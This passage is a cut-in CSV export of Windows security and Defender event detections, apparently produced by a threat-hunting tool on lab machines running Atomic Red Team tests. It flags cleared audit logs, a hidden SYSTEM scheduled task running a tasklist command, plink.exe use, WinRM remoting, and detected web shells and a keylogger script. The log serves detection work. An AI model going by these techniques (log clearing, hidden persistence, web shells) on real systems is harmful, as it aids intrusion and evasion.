7c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + 
WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + +",PC01.example.corp,Security +schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 432901 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",WIN-77LTAPHIQ1R.example.corp,Security +network share object was 
added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142," + + + + + 5142 + 0 + 0 + 12808 + 0 + 0x8020000000000000 + + + 6273 + + + + + Security + PC04.example.corp + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + \\*\PRINT + c:\windows\system32 + +",PC04.example.corp,Security +Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 566821 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 6272 + + + + + Security + PC04.example.corp + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + + +",PC04.example.corp,Security +Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 565591 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32950 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( 
Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32853 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 161471 + + + + + Security + MSEDGEWIN10 + + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x52a7d + + +",MSEDGEWIN10,Security +Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 433307 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",PC01.example.corp,Security +Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +",PC01.example.corp,Security +Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + 
+ +",PC01.example.corp,Security +Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 227693 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0xaf855 + + +",PC01.example.corp,Security +connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91," + + + + + 91 + 0 + 4 + 9 + 0 + 0x4000000000000004 + + + 508 + + + + + Microsoft-Windows-WinRM/Operational + DC1.insecurebank.local + + + + + 15005 + shellId + 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 + +",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational +Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 106 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + 
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 5 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 6 + %%811 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 105 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 3 + + 2 + 3 + %%818 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 104 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 103 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 102 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. 
+ + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. 
+ + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 95 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 76 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 75 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 48 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. 
+ + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, 